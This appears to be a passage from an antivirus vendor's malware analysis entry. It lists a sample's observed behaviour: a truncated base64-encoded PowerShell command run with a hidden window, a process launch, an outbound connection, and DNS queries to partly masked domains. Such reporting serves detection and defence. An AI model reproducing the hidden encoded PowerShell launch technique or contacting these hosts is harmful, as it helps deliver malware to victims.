Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3A...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3968
- 'ci##jr.com':443
- DNS ASK vs##ar.com
- DNS ASK bi######btechsolutions.com
- DNS ASK sh####tubuddin.org
- DNS ASK cy########001-site5.gtempurl.com
- DNS ASK st###speed.vip
- DNS ASK tr###g.com.br
- DNS ASK ci##jr.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3A... (со скрытым окном)